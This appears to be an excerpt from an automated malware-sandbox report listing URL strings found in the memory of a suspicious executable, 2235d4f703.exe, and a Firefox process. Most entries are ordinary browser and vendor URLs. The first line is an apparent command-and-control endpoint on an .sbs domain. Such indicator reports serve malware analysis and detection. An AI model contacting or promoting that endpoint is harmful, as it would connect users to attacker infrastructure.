Source: 2235d4f703.exe, 00000009.00000003.2738474191.0000000001235000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000019.00000002.3027734740.000002348AC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.js
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.js/shims/adsafeprotected-ima.jsWeb
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000019.00000003.2851793523.000002348D959000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000003.2851793523.000002348D9F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000019.00000003.2809217950.0000023495930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.0000023495583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000019.00000003.2809646575.000002349591E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000003.2809646575.000002349591E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: 2235d4f703.exe, 00000009.00000003.2603852920.00000000058B2000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734763137.0000000005B53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000019.00000002.3045686159.000002348B765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2843555882.000002348E8C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
Source: 2235d4f703.exe, 0000000B.00000003.2789180940.0000000005C10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 2235d4f703.exe, 00000009.00000003.2603962123.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629621573.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629288194.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2603852920.00000000058B0000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2758244772.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734985175.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2759070129.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734763137.0000000005B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 2235d4f703.exe, 00000009.00000003.2603962123.0000000005884000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734985175.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000001A.00000003.2851568099.0000000005952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 2235d4f703.exe, 00000009.00000003.2603962123.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629621573.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2629288194.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2603852920.00000000058B0000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2758244772.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734985175.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2759070129.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734763137.0000000005B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 2235d4f703.exe, 00000009.00000003.2603962123.0000000005884000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2734985175.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000001A.00000003.2851568099.0000000005952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2799950747.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000019.00000002.2972813755.000002348A40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2755601551.000002348D37B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754071325.000002348D320000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2851793523.000002348D9F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/main/anti-tracking-url-decorationchrome://browser
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3027734740.000002348ACE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000019.00000003.2809217950.000002349597F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000019.00000002.2972813755.000002348A40F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2751068754.000002348D100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2755601551.000002348D37B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754071325.000002348D320000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2851793523.000002348D959000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/UPDATE
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000002.3027734740.000002348AC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2832846833.000002349599B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2937859220.000000ADEF1AC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2832846833.000002349599D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 2235d4f703.exe, 00000009.00000003.2659455173.000000000597D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2789180940.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2849740014.000002348E738000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000019.00000003.2848449096.000002348E7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
